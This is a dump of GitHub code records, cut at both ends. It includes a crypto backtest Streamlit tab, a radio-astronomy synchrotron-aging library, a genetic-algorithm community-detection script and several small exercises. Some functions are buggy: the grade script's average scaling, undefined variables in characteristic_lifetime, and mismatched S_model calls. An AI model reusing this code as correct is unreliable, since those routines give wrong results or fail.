souhaité\", market_list)\n if market == market_list[0]:\n mrkt = \"cryptos\"\n senari_list = [\"covid (date : 2019-11-11)\", \"ukr_war (date : 2022-02-24)\", \"année_2018 (date : 2017-12-1)\", \"année_2018_flat (date : 2018-09-01)\", \"année_2019_flat (date : 2019-1-1)\", \"année_2021_Nov\",\n \"année_2021_Oct\", \"random1 (date : 2020-02-01)\", \"random2 (date : 2020-05-23)\", \"random3 (date : 2020-09-01)\"]\n elif market == market_list[1]:\n mrkt = \"nasdaq\"\n senari_list = [\"covid (date : 2019-11-11)\", \"ukr_war (date : 2022-02-24)\", \"année_2018 (date : 2017-12-1)\", \"année_2018_flat (date : 2018-09-01)\", \"année_2019_flat (date : 2019-1-1)\", \"année_2021_Nov\",\n \"année_2021_Oct\", \"random1 (date : 2020-02-01)\", \"random2 (date : 2020-05-23)\", \"random3 (date : 2020-09-01)\", \"subprimes_DF (date : 2007-11-01)\", \"new_millennium_DF (date : 1999-06-06)\"]\n senar = st.selectbox(\"Selectionnez le scénario souhaité\", senari_list)\n\n if senar == senari_list[0]:\n snr = \"covid_DF\"\n elif senar == senari_list[1]:\n snr = \"ukr_war_DF\"\n elif senar == senari_list[2]:\n snr = \"année_2018_DF\"\n elif senar == senari_list[3]:\n snr = \"année_2018_flat_DF\"\n elif senar == senari_list[4]:\n snr = \"année_2019_flat_DF\"\n elif senar == senari_list[5]:\n snr = \"année_2021_Nov_DF\"\n elif senar == senari_list[6]:\n snr = \"année_2021_Oct_DF\"\n elif senar == senari_list[7]:\n snr = \"rdm1_DF\"\n elif senar == senari_list[8]:\n snr = \"rdm2_DF\"\n elif senar == senari_list[9]:\n snr = 'rdm3_DF'\n elif senar == senari_list[10]:\n snr = 'subprimes_DF'\n else:\n snr = 'new_millennium_DF'\n sharp = []\n metrics = []\n # nettoyage des données\n\n # Création et affichage dataframes\n st.write('************ ' + snr + ' **********') # je charge le premier\n #X = pd.DataFrame(data=np.array(metrics), columns=metric_name, index=noms_algos)\n #Y = X.sort_values(by='Ratio de Sharpe', ascending=False)\n #Y = Y[Y['Ratio de Sharpe'] > 1].head(4)\n \n\n X = pd.read_csv(f\"./data_csv/{mrkt}/summary_table_{snr}.csv\", index_col= 0)\n Y = X.sort_values(by='Ratio de Sharpe', ascending=False)\n Y = Y[Y['Ratio de Sharpe'] > 1].head(4)\n \n\n #X.to_csv(f\"./data_csv/{mrkt}/summary_table_{snr}.csv\")\n st.write(X)\n\n #Affichage meilleurs algos\n st.write('===========>>>>> ' + 'Meilleures performances pour : ', list(Y.index))\n\"\"\" def summaries(scenari, nom):\n for a,b in zip(scenari, nom):\n summary_table(a,b)\n summaries(f\"{mrkt}/{snr}.csv\", snr)\"\"\"\n #summaries(Scenar_nasdaq_path[1], Scenar_nasdaq[1])\n","repo_name":"Drosophobe/pyCrypto","sub_path":"src/StreamLitpyCrypto/tab3.py","file_name":"tab3.py","file_ext":"py","file_size_in_byte":5155,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13059593755","text":"#!/usr/bin/env python\n\n# Simple lib to estimate plasma aging - Henrik Edler, 2022\n\nimport multiprocessing as mp\nimport astropy.units as u\nfrom scipy import special, integrate, interpolate\nimport logging as log\nimport numpy as np\nimport warnings\n# Some strange behavior of the integrand raises annoying warnings - mute them for now...\nwarnings.filterwarnings('ignore', category=integrate.IntegrationWarning, append=True)\n\n### Define constants\n### Throughout this script, SI units are used!!\nc = 299792458.0 # m/s\nm_e = 9.1093837015e-31 # kg\nsigma_T = 6.6524587321e-29 # m2\nmu0 = 1.25663706212e-06 # N A-2\ne = 1.602176634e-19 # Coulomb\neps0 = 8.8541878128e-12 # F/m\nU_cmb = 4.19e-14 # J m-3 CMB energy density at z=0\n\ndef nu_c(E, B, alpha):\n \"\"\"\n Critical frequency for synchrotron\n Parameters\n ----------\n E: float, energy in SI\n B\n alpha\n\n Returns\n -------\n\n \"\"\"\n # Critical frequency\n return (3*(E / (c ** 2 * m_e)) ** 2 * e * B * np.sin(alpha) / (4 * np.pi * m_e)) # Hardcastle and Longair 3/4, Hardwood 6/4...\n\ndef F_accurate(x):\n # numerical integral defining F(x). Use this to calculate lookup-table.\n return x*integrate.quad(lambda z: special.kv(5./3., z), x, np.inf, epsrel=1.e-5, limit=2000)[0]\n\ndef create_F_lookup():\n xvals = np.logspace(-4,1.4,1000)\n with mp.Pool() as p:\n results = p.map(F_accurate, xvals)\n np.save(__file__.replace('lib_aging.py','')+'lib_aging_data/F(X)_lookup.npy', np.array([xvals, results]))\n\ndef n_e(E, iidx, B, t, z):\n \"\"\"\n Electron density taking into account Jaffe-Perola + IC losses\n Parameters\n ----------\n E: float, energy in J\n iidx: float, spectral index\n B: float, magnetic field in Tesla\n t: float, age in s\n z: float, redshift z\n\n Returns\n -------\n electron density, float\n \"\"\"\n # C = B**2*(4*sigma_T/(6*m_e**2*c**3*mu0))\n beta = E*t*(B**2/(2*mu0) + U_cmb*(1+z)**4)*(4*sigma_T/(3*m_e**2*c**3)) # Harwood 2013 has nu_c**3 instead of c. But this can't be right?\n # slightly confusing with exponent indices here since different sign conventions exist...\n if beta >= 1:\n return 0.\n else:\n return E ** (-2 * iidx - 1) * ((1 - beta) ** ((2 * iidx + 1) - 2))\n\n# def n_e_fermi2_steady_state(E, B, q, D_0, z, C_i=0):\n# \"\"\"\n# Electron density taking into account Synch. + IC losses and 2nd order fermit accelleration.\n# Underlying assumption is a power-law energy dependency of the acceleration time -> t_acc = t_0 * p^k\n# Steady state solution.\n# https://www.science.org/action/downloadSupplement?doi=10.1126%2Fsciadv.1701634&file=1701634_sm.pdf\n# Parameters\n# ----------\n# E: float, energy in J\n# B: float, magnetic field in Tesla\n# t_0: float, acceleration timescale normalization\n# k: float, exponent of acceleration time\n# z: float, redshift z\n#\n# Returns\n# -------\n# electron density, float\n# \"\"\"\n# p = c**-1 * (E**2 - m_e**2 * c**4)**0.5 # probably E \\approx pc would be fine\n# C = (4*sigma_T * (3.2e-10)**2 )/ (3 * m_e**2 * c**3 * mu0)\n# F = 4.8e-4 * ((B / (3.2e-10))**2 + (1+z)**4)\n# C_i = 0 # integration constant\n#\n# k = 3 - q\n# mp.dps = 15\n# #print((k-4)/k, -(F*p**k)/(D_0*k), np.complex(mpmath.gammainc((k-4)/k, -(F*p**k)/(D_0*k))))\n# sum1 = (1/F)*(-F/(D_0*k))**(4/k)*np.complex(mpmath.gammainc((k-4)/k, -(F*p**k)/(D_0*k))).real\n# sum2 = C_i/D_0\n# mul = - p**2 * np.exp((-F*p**k)/(D_0*k))\n# #print(sum1, sum2, mul, -F*p**k/(D_0*k))\n# res = mul * (sum1 + sum2)\n# if res < 0:\n# return 0\n# else:\n# return res\n\n# def n_e_fermi2_steady_state2(E, B, q, D_0, z):\n# \"\"\"\n# Electron density taking into account Synch. + IC losses and 2nd order fermit accelleration.\n# Underlying assumption is a power-law energy dependency of the acceleration time -> t_acc = t_0 * p^k\n# Steady state solution ignoring the integration constant in the ODE.\n# See also Stawarz et al. 2008.\n#\n# Parameters\n# ----------\n# E: float, energy in J\n# B: float, magnetic field in Tesla\n# q: float, spectral index of turbulence. 5/3 is Kolmogorov case, 2 is hard-sphere\n# D_0: float, reacceleration coefficient\n# z: float, redshift z\n#\n# Returns\n# -------\n# electron density, float\n# \"\"\"\n# # p = c**-1 * (E**2 - m_e**2 * c**4)**0.5 # probably E \\approx pc would be fine\n# p = E\n# C = (4*sigma_T * (3.2e-10)**2 )/ (3 * m_e**2 * c**3 * mu0)\n# F = 4.8e-4 * ((B / (3.2e-10))**2 + (1+z)**4)\n# F = C * ((B / (3.2e-10))**2 + (1+z)**4)\n# # print(-F*p**(3-q)/(D_0*(3-q)))\n# return p**2 * np.exp((-F*p**(3-q))/(D_0*(3-q)))\n\n\nclass S_model():\n # TODO: move everything to log-space!\n # TODO: take into account upper limits?\n\n def __init__(self, epsrel=1.e-3):\n # use lookup table for F(x)\n with open(__file__.replace('lib_aging.py', '') + 'lib_aging_data/F(X)_lookup.npy', 'rb') as f:\n xF_dat = np.load(f)\n self.F_interp = interpolate.InterpolatedUnivariateSpline(xF_dat[0], xF_dat[1], ext=0, check_finite=False)\n self.epsrel = epsrel\n\n def evaluate(self, nu, B, iidx, t, z, N0=1.):\n \"\"\"\n Synchrotron flux density including basic Jaffe-Perola aging.\n Parameters\n ----------\n nu: float or numpy array\n Frequency in Hertz\n B: float\n B in Tesla\n iidx: float\n Injection index, positive definition\n t: float, or numpy array\n Age in Myrs\n N0: float,\n Normaliation factor, optional.\n\n Returns\n -------\n flux density: float or numpy array\n Arbitrary units\n \"\"\"\n t *= 1e6*3.154e7 # Myrs to seconds\n nu = nu*(1+z) # redshift frequency\n C0 = (z+1)**-2*N0*3**0.5*e**3*B/(8*np.pi*eps0*c*m_e)\n E_min, E_max = 0.5e6*1.60218e-19, 1.e11*1.60218e-19 # eV, TODO: units...\n\n def integrand(logE, alpha):\n \"\"\"\n Integrand to call\n Parameters\n ----------\n E: float, energy in J\n alpha: float, impact angle\n \"\"\"\n try:\n logE = logE[:,np.newaxis]\n alpha = alpha[np.newaxis]\n result = np.log(10) * 10**logE * self.F(nu/nu_c(10**logE,B,alpha))*0.5*np.sin(alpha)**2*n_e(10**logE, iidx, B, t, z)\n result[np.isnan(result)] = 0.0 # case zero times infinity\n return result\n except (IndexError, TypeError) as e:\n if alpha == 0.:\n return 0.\n else:\n return np.log(10) * 10**logE * self.F(nu/nu_c(10**logE,B,alpha))*0.5*np.sin(alpha)**2*n_e(10**logE, iidx, B, t, z)\n\n res_quad = C0 * integrate.dblquad(integrand, 1e-4, np.pi, np.log10(E_min), np.log10(E_max), epsrel=self.epsrel)[0] # rough integration\n # TODO check order of integration borders\n # res_quad = C0 * integrate.dblquad(integrand, 1e-4, np.pi, np.log10(E_min), np.log10(E_max), epsrel=self.epsrel)[0] # rough integration\n return res_quad\n\n def evaluate_fermi2_steady_state(self, nu, B, z, q, D_0, N0=1.):\n \"\"\"\n Synchrotron flux density including Jaffe-Perola model, synch. and IC aging as well as 2nd order fermi acceleration.\n Parameters\n ----------\n nu: float or numpy array\n Frequency in Hertz\n B: float\n B in Tesla\n z: float, redshift\n t_acc: float\n acceleration timescale in Myrs\n N0: float,\n Normaliation factor, optional.\n\n Returns\n -------\n flux density: float or numpy array\n Arbitrary units\n \"\"\"\n # t_acc *= 1e6*3.154e7 # Myrs to seconds\n nu = nu*(1+z) # redshift frequency\n C0 = (z+1)**-2*N0*3**0.5*e**3*B/(8*np.pi*eps0*c*m_e)\n E_min, E_max = 0.5e6*1.60218e-19, 1.e10*1.60218e-19 # eV, TODO: units...\n\n def integrand(E, alpha):\n \"\"\"\n Integrand to call\n Parameters\n ----------\n E: float, energy in J\n alpha: float, impact angle\n \"\"\"\n return self.F(nu/nu_c(E,B,alpha))*0.5*np.sin(alpha)**2*n_e_fermi2_steady_state2(E, B, q, D_0, z)\n\n return C0*integrate.dblquad(integrand, 0, np.pi, E_min, E_max, epsrel=self.epsrel)[0] # rough integration\n\n def F(self, x):\n return np.vectorize(self._F)(x)\n\n def _F(self, x):\n # F(x): Use asymptotes below and above, in between interpolate lookup table\n # Mourad Fouka1and Saad Ouichaoui, 2013\n if x > 25:\n return np.sqrt(np.pi*x/2)*np.exp(-x)\n elif x < 1e-4:\n return np.pi*2**(5/3)/(special.gamma(1/3)*np.sqrt(3))*x**(1/3)\n else:\n return self.F_interp(x)\n\n\ndef get_si(nu1, nu2, S1, S2):\n return np.log(S1 / S2) / np.log(nu1 / nu2)\n\n\ndef get_aging_si(nu1, nu2, B, injection_index, times, z, model=None):\n \"\"\"\n Return the Jaffe-Perola aging path in a color-color plot.\n Parameters\n ----------\n nu1: float\n lower spectral index HERTZ.\n nu2: list of two floats\n upper spectral index HERTZ.\n B: float\n Magnetic field in Tesla\n injection_index: float\n injection spectral index (positive definition)\n times: array of floats\n times at which to evaluate the SI in Myr\n z: float\n Redshift\n Returns\n -------\n si: array, sequence of the spectral indices at different times\n \"\"\"\n try:\n times[0]\n except IndexError:\n times = [times]\n S_array = np.zeros((len(times), 2))\n if model is None:\n model = S_model()\n for i, t in enumerate(times):\n S_array[i,0] = model.evaluate(nu1, B, injection_index, t, z)\n S_array[i,1] = model.evaluate(nu2, B, injection_index, t, z)\n si = get_si(nu1, nu2, S_array[:,0], S_array[:,1])\n return si\n\ndef get_aging_si_steady_state(nu1, nu2, B, q, D_0, z, model=None):\n \"\"\"\n Return the Jaffe-Perola aging path in a color-color plot.\n Parameters\n ----------\n nu1: float\n lower spectral index HERTZ.\n nu2: list of two floats\n upper spectral index HERTZ.\n B: float\n Magnetic field in Tesla\n q: float\n spectral index of momentum space diffusion coefficient\n D_0: float\n reacceleration factor\n z: float\n Redshift\n Returns\n -------\n si: array,\n \"\"\"\n try:\n D_0[0]\n except IndexError:\n D_0 = [D_0]\n S_array = np.zeros((len(D_0), 2))\n if model is None:\n model = S_model()\n for i, t in enumerate(D_0):\n S_array[i,0] = model.evaluate_fermi2_steady_state(nu1,B,z,q,np.array(D_0))\n S_array[i,1] = model.evaluate_fermi2_steady_state(nu2,B,z,q,np.array(D_0))\n si = get_si(nu1, nu2, S_array[:,0], S_array[:,1])\n return si\n\n\ndef get_model_si_vs_B(nu1, nu2, B_range, injection_index, z, t):\n \"\"\"\n Return the Jaffe-Perola aging path in a color-color plot.\n Parameters\n ----------\n nu1: float\n lower spectral index HERTZ.\n nu2: list of two floats\n upper spectral index HERTZ.\n B_range: list of len 2, [lower, upper]\n Magnetic field in Tesla\n injection_index: float\n injection spectral index (positive definition)\n z: float\n Redshift\n t: of floats\n times at which to evaluate the SI in Myr\n Returns\n -------\n si: array, sequence of the spectral indices at different times\n \"\"\"\n S_array = np.zeros((len(B_range), 2))\n for i, B in enumerate(B_range):\n S_array[i,0] = S_model(nu1, B, injection_index, t, z)\n S_array[i,1] = S_model(nu2, B, injection_index, t, z)\n si = get_si(nu1, nu2, S_array[:,0], S_array[:,1])\n return si\n\ndef characteristic_lifetime(nu, B, z):\n \"\"\"\n Characteristic lifetime of electrons observed at frequency nu\n Taken from van Weeren 2019 review paper\n\n Parameters\n ----------\n nu: float, freq in Hz\n B: float, B in Tesla\n z: float, redshift\n\n Returns\n -------\n t_age: float, characteristic lifetime in Myr\n \"\"\"\n log.error('not fully implemented check RAiSE III: 3C radio AGN energetics and composition to fix ')\n B_cmb = 3.18e-10 * (1+z)**2\n nu_b = 4*np.pi*m_e**3*c**4 / (3*e*E**2*B*np.sin(alpha))\n v = np.sqrt(243*np.pi*m_e**5*c**2/(4*mu0**2*e**7))\n return nu*(B/(nu_b*(1+z)))**0.5 / (B**2 + B_cmb**2)\n # return 3.2e10*(B**0.5 / (B**2+(B_cmb*(1+z)**2)**2))*((1+z)*nu)**-0.5*1e-6\n\ndef plot_S_model():\n # Debug plotting\n B = 5e-10\n nu_range = np.logspace(np.log10(30e6), 9, 6)\n age_range = np.linspace(0, 200, 5)\n\n from agnpy.emission_regions import Blob\n from agnpy.synchrotron import Synchrotron\n blob = Blob(z=0.001, B = 10**4*B*u.gauss, spectrum_dict = {\"type\": \"PowerLaw\", \"parameters\": {\"p\": 2.3,\"gamma_min\": 2,\"gamma_max\": 1e7}})\n synch = Synchrotron(blob)\n sed = synch.sed_flux(nu_range*u.Hz)\n sed = sed.value / nu_range\n\n results = np.zeros((len(age_range), len(nu_range)))\n for i, age in enumerate(age_range):\n with mp.Pool() as p:\n results[i] = p.starmap(S_model, [[nu, B, 0.65, 1000, age] for nu in nu_range])\n print(results[i], nu_range)\n\n PL = (nu_range**-0.65)\n PL /= (PL[0]/sed[0])\n print((results[0,0]/sed[0]))\n results /= (results[0,0]/sed[0])\n\n import matplotlib.pyplot as plt\n plt.close()\n print(nu_range, sed)\n plt.plot(nu_range, sed, c='k', label=f'AGNPY for 0 Myr; B = {B}T')\n plt.plot(nu_range, PL, label=f'PL alpha = 0.65', c='k', ls='dotted')\n for age, res in zip(age_range, results):\n plt.plot(nu_range, res, label=f'{age}Myr; B = {B}T')\n plt.xscale('log')\n plt.yscale('log')\n plt.xlabel('frequency [Hz]')\n plt.ylabel('S')\n # plt.xlim([np.min(nu_range), np.max(nu_range)])\n # plt.ylim([np.min(res), 1.05*np.max(res)])\n plt.legend()\n plt.savefig(__file__.replace('lib_aging.py','')+'lib_aging_data/synch_vs_nu.png')\n\n","repo_name":"revoltek/scripts","sub_path":"lib_aging.py","file_name":"lib_aging.py","file_ext":"py","file_size_in_byte":14020,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"19555308980","text":"maths=int(input(\"Enter Maths marks\"))\nphysics=int(input(\"Enter Physics marks\"))\nchemistry=int(input(\"Enter Chemistry marks\"))\n\nif(maths<35 and physics<35 and chemistry<35):\n print(\"He failed\")\nelse:\n average=(maths+physics+chemistry)/300\n if(average>=69):\n print(\"You got A grade\")\n elif(average<=69 and average>=59):\n print(\"You got B grade\")\n else:\n print(\"You got C grade\")","repo_name":"himani1213/SpringMicroservices","sub_path":"New Workspace/BasicPrograms/subjects.py","file_name":"subjects.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27498991958","text":"import sys\n\nsys.stdin = open('input.txt')\n\nN = int(input())\nnums = []\nnums_dict = {}\nfor _ in range(N):\n n = int(input())\n nums.append(n)\n if n in nums_dict:\n nums_dict[n] += 1\n else:\n nums_dict[n] = 1\nnums.sort()\nmost = []\nm = 0\nfor k, v in nums_dict.items():\n if v > m:\n m = v\n most = []\n most.append(k)\n elif v == m:\n most.append(k)\nprint(int(round(sum(nums)/N,0)))\nprint(nums[N//2])\nif len(most) > 1:\n most.sort()\n print(most[1])\nelse:\n print(most[0])\nprint(nums[-1] - nums[0])\n","repo_name":"khjeon5328/today_algorithm","sub_path":"2020/2020.12월/22/2108.py","file_name":"2108.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70692532674","text":"import warnings\nfrom collections import Counter\nimport networkx as nx\nimport networkx.algorithms.community as nx_comm\nfrom random import seed\n\nfrom lab3.GA import GA\nfrom lab3.chromosome import Chromosome\n\n\ndef readGML(fileName):\n g = nx.read_gml(fileName, label=None)\n mat = nx.to_numpy_array(g)\n net = {'noNodes': g.number_of_nodes(), 'edges': g.number_of_edges(), 'mat': mat}\n\n degrees = []\n noEdges = 0\n for i in range(0, net['noNodes']):\n d = 0\n for j in range(0, net['noNodes']):\n if mat.item((i, j)) == 1:\n d += 1\n if j > i:\n noEdges += mat.item((i, j))\n degrees.append(d)\n net['degrees'] = degrees\n return net\n\n\nparam = readGML('data/dolphins/dolphins.gml')\n# param = readGML('data/football/football.gml')\n# param = readGML('data/karate/karate.gml')\n# param = readGML('data/krebs/krebs.gml')\n# param = readGML('data/adjnoun/adjnoun.gml')\n# param = readGML('data/lesmis/lesmis.gml')\n# param = readGML('data/netscience/netscience.gml')\n\nMIN = 0\nMAX = param['noNodes']\n\n\ndef modularity(communities):\n noNodes = param['noNodes']\n mat = param['mat']\n degrees = param['degrees']\n m = param['edges']\n q = 0.0\n for i in range(0, noNodes):\n for j in range(0, noNodes):\n if communities[i] == communities[j]:\n q += (mat[i][j] - degrees[i] * degrees[j] / m)\n return abs(q * (1 / m))\n\n\ndef solveGA():\n generations = []\n\n seed(1)\n\n gaParam = {'popSize': 100, 'noGen': 1000}\n problParam = {'min': MIN, 'max': MAX, 'function': modularity, 'noNodes': MAX}\n\n ga = GA(gaParam, problParam)\n ga.initialistion()\n ga.eval()\n\n allComms = []\n allFitnesses = []\n\n bestestComs = 0\n bestestChromosome = Chromosome(problParam)\n bestestChromosome.fitness = 0\n bestestRepr = []\n\n for g in range(gaParam['noGen']):\n generations.append(g)\n\n bestChromosome = ga.bestChromosome()\n\n communities_dict = {}\n for i in range(len(bestChromosome.repres)):\n if bestChromosome.repres[i] in communities_dict:\n communities_dict[bestChromosome.repres[i]].append(i)\n else:\n communities_dict[bestChromosome.repres[i]] = [i]\n\n allComms.append(len(communities_dict))\n allFitnesses.append(bestChromosome.fitness)\n\n if bestestChromosome.fitness < bestChromosome.fitness:\n bestestChromosome = bestChromosome\n bestestRepr = bestChromosome.repres\n bestestComs = len(communities_dict)\n\n ga.oneGeneration()\n # ga.oneGenerationElitism()\n # ga.oneGenerationSteadyState()\n\n print('Generation: ' + str(g) + ' communities: ' + str(\n len(Counter(bestChromosome.repres).items())) + ' best solution in generation = ' + str(\n bestChromosome.repres) + ' fitness = ' + str(bestChromosome.fitness))\n\n print(\"Best chromosome fitness: \", bestestChromosome.fitness)\n\n print(\"Fitness evolution of the best chromosome: \")\n print(allFitnesses)\n\n print(\"Communities for the best chromosome: \" + str(bestestComs))\n\n print(\"Community evolution: \")\n print(allComms)\n\n print('Index communities for the best chromosome: ')\n for i in range(0, len(bestestRepr)):\n print(str(i) + \": \" + str(bestestRepr[i]))\n\n\nif __name__ == \"__main__\":\n solveGA()\n warnings.simplefilter('ignore')\n","repo_name":"andrei45635/AI","sub_path":"lab3/laborator3.py","file_name":"laborator3.py","file_ext":"py","file_size_in_byte":3418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23585370201","text":"import numpy as np\r\n\r\n\r\ndef calc_area(rhs):\r\n res = rhs[-1][0] ** 2\r\n for r, h in rhs:\r\n res += 2 * h * r\r\n return res\r\n\r\n\r\ndef find_min(rhs, mp):\r\n mm, idx = 0, -1\r\n for i in range(len(rhs) - 1):\r\n tmp = mp - 2 * rhs[i][0] * rhs[i][1]\r\n if tmp > mm:\r\n mm, idx = tmp, i\r\n r, h = rhs[-1]\r\n tmp = mp - 2 * h * r - (r**2 - rhs[-2][0]**2)\r\n if tmp > mm:\r\n mm, idx = tmp, len(rhs) - 1\r\n return mm, idx\r\n\r\n\r\ndef main():\r\n t = int(input())\r\n for case in range(1, t + 1):\r\n n, k = map(int, input().split())\r\n rhs = []\r\n for _ in range(n):\r\n r, h = map(int, input().split())\r\n rhs += [(r, h)]\r\n rhs = sorted(rhs)\r\n mp = calc_area(rhs)\r\n\r\n for _ in range(n - k):\r\n mm, idx = find_min(rhs, mp)\r\n rhs.pop(idx)\r\n mp = mm\r\n\r\n print('Case #{}: {}'.format(case, mp * np.pi))\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_209/168.py","file_name":"168.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35368915141","text":"import torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.optim as optim\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import MDS\nfrom sklearn.manifold import TSNE\nimport numpy as np\nimport argparse\n\nparser = argparse.ArgumentParser(description='dimensionality reduction with fashion mnist')\nparser.add_argument('--method', default='pca', help='pca/mds/tsne')\n\ndef PCA_(test_data):\n\n\t#apply PCA to the testing data\n\tpca = PCA(n_components=2)\n\tpca.fit(test_data)\n\ttest_data = pca.transform(test_data)\n\n\treturn test_data\n\ndef MDS_(test_data):\n\n\tmds = MDS(n_components=2)\n\ttest_data = mds.fit_transform(test_data)\n\n\treturn test_data\n\ndef TSNE_(test_data):\n\n\ttsne = TSNE(n_components=2)\n\ttest_data = tsne.fit_transform(test_data)\n\n\treturn test_data\n\ndef main():\n\n\targs = parser.parse_args()\n\n\t#get testing data\n\ttest_data_ = torchvision.datasets.FashionMNIST(root='./fashion_mnist_data', train=False, download=True, transform=transforms.ToTensor())\n\n\t#flatten the testing data\n\ttest_data = test_data_.data.numpy()\n\ttest_data = test_data.astype(float)/255.0\n\ttest_data = test_data.reshape(test_data.shape[0], 784)\n\n\t#get testing labels\n\ttest_label = test_data_.targets.numpy()\n\ttest_label = test_label.reshape(10000, 1)\n\n\t#apply dimensionality reduction\n\tif args.method == 'pca':\n\t\ttest_data = PCA_(test_data)\n\telif args.method == 'mds':\n\t\ttest_data = MDS_(test_data)\n\telif args.method == 'tsne':\n\t\ttest_data = TSNE_(test_data)\n\n\tresult = np.concatenate((test_data, test_label), axis=1)\n\tnp.savetxt(args.method + \".csv\", result, header=\"x,y,target\", comments='', delimiter=',', fmt=['%.5f', '%.5f', '%d'])\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"yyou22/D3-Dimensionality-Reduction","sub_path":"mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36034872994","text":"__metaclass__ = type\n__all__ = [\n 'BugsBrowserRequest',\n 'BugsLayer',\n 'bugs_request_publication_factory',\n 'LaunchpadBugContainer',\n ]\n\n\nfrom zope.interface import implements\nfrom zope.publisher.interfaces.browser import (\n IBrowserRequest,\n IDefaultBrowserLayer,\n )\n\nfrom lp.services.webapp.interfaces import ILaunchpadContainer\nfrom lp.services.webapp.publication import LaunchpadBrowserPublication\nfrom lp.services.webapp.publisher import LaunchpadContainer\nfrom lp.services.webapp.servers import (\n LaunchpadBrowserRequest,\n VHostWebServiceRequestPublicationFactory,\n )\n\n\nclass BugsLayer(IBrowserRequest, IDefaultBrowserLayer):\n \"\"\"The Bugs layer.\"\"\"\n\n\nclass BugsBrowserRequest(LaunchpadBrowserRequest):\n \"\"\"Instances of BugBrowserRequest provide `BugsLayer`.\"\"\"\n implements(BugsLayer)\n\n\ndef bugs_request_publication_factory():\n return VHostWebServiceRequestPublicationFactory(\n 'bugs', BugsBrowserRequest, LaunchpadBrowserPublication)\n\n\nclass LaunchpadBugContainer(LaunchpadContainer):\n\n def isWithin(self, scope):\n \"\"\"Is this bug within the given scope?\n\n A bug is in the scope of any of its bugtasks' targets.\n \"\"\"\n for bugtask in self.context.bugtasks:\n if ILaunchpadContainer(bugtask.target).isWithin(scope):\n return True\n return False\n","repo_name":"abramhindle/UnnaturalCodeFork","sub_path":"python/testdata/launchpad/lib/lp/bugs/publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44662450948","text":"# Создайте новую Базу данных. Поля: id, 2 целочисленных поля. Целочисленные поля заполняются рандомно от 0 до 9.\n# Посчитайте среднее арифметическое всех элементов без учёта id.\n# Если среднее арифметическое больше количества записей в БД, то удалите четвёртую запись БД\n#\nimport sqlite3\nimport random # для заполнения данных рандомно\n\nconn = sqlite3.connect('dz.db')\ncursor = conn.cursor()\n\ncursor.execute('''CREATE TABLE IF NOT EXISTS tab_1(id INTEGER PRIMARY KEY AUTOINCREMENT, col_1 INT, col_2 INT)''')\n\nfor i in range(5):\n a = random.randint(0, 9)\n b = random.randint(0, 9)\n cursor.execute('''INSERT INTO tab_1(col_1, col_2) VALUES (?, ?)''', (a, b)) # для заполнения данных\n# conn.commit() # для запоминания данных в базе\ncursor.execute('''SELECT col_1, col_2 FROM tab_1''') # вызываем данные без id для подсчета среднего значения\nk = cursor.fetchall() # вызываем атрибут\nprint(k, len(k))\n\naver = []\nfor i in k:\n aver.append((sum(i) / len(i))) # добавляем средние значения по каждому кортежу в список\n if (sum(aver) / len(aver)) > len(k): # среднее арифметическое всех элементов в базе данных\n cursor.execute('''DELETE FROM tab_1 WHERE id=4''') # удаляем четвертую запись по условию задачи\n cursor.execute('''SELECT * FROM tab_1''') # вызываем данные с id, для выполнения условия удаления\n k = cursor.fetchall() # вызываем атрибут\n\nprint(aver) # список средних значений кортежей\nprint('average values', sum(aver) / len(aver)) # среднее значение, для понимания выполнения задачи\nprint(k, len(k)) # если сработает условие, длинна будет меньше на одну запись id 4\n","repo_name":"VitasNV/Git_lesson","sub_path":"SQL.py","file_name":"SQL.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74272441475","text":"def binarioparainteiro(binario):\n contador = 0\n global inteiro\n inteiro = 0 \n \n while(binario != 0):\n a = binario % 10\n inteiro = inteiro + a *pow(2, contador)\n binario = binario // 10\n contador += 1 \n return inteiro\n \nbinario = 0\nx = 0\ninteiroFinal = 0\ncontador = 1\na = 0\nb = 0\nc = 0\n\nwhile x != \"saida\":\n x = input()\n SubZero = x.replace(\"-\",\"0\")\n SubUm = SubZero.replace(\"*\",\"1\")\n x = SubUm\n if x != \"caw caw\":\n binarioparainteiro(int(x))\n inteiroFinal += inteiro\n elif x == \"caw caw\":\n if contador == 1:\n a = inteiroFinal\n inteiroFinal = 0\n contador += 1\n elif contador == 2:\n b = inteiroFinal\n inteiroFinal = 0\n contador += 1\n elif contador == 3:\n c = inteiroFinal\n x = \"saida\"\nprint (a)\nprint (b)\nprint (c)","repo_name":"andersonaoliveira/Exercicios-em-Python---beecrowd","sub_path":"1848 - Corvo Contador/1848 - Corvo Contador.py","file_name":"1848 - Corvo Contador.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35499950486","text":"from clarifai.rest import ClarifaiApp\nfrom clarifai.rest import Image as ClImage\nimport os\nimport time\nfrom django.conf import settings\n\ningredientTypes = {\n 'Henny': 'Cogniac',\n 'Goose': 'Vodka',\n 'Lime': 'Garnish',\n 'Ciroc': 'Vodka',\n 'Jameson': 'Whiskey',\n 'DryVermouth': 'Dry Vermouth',\n 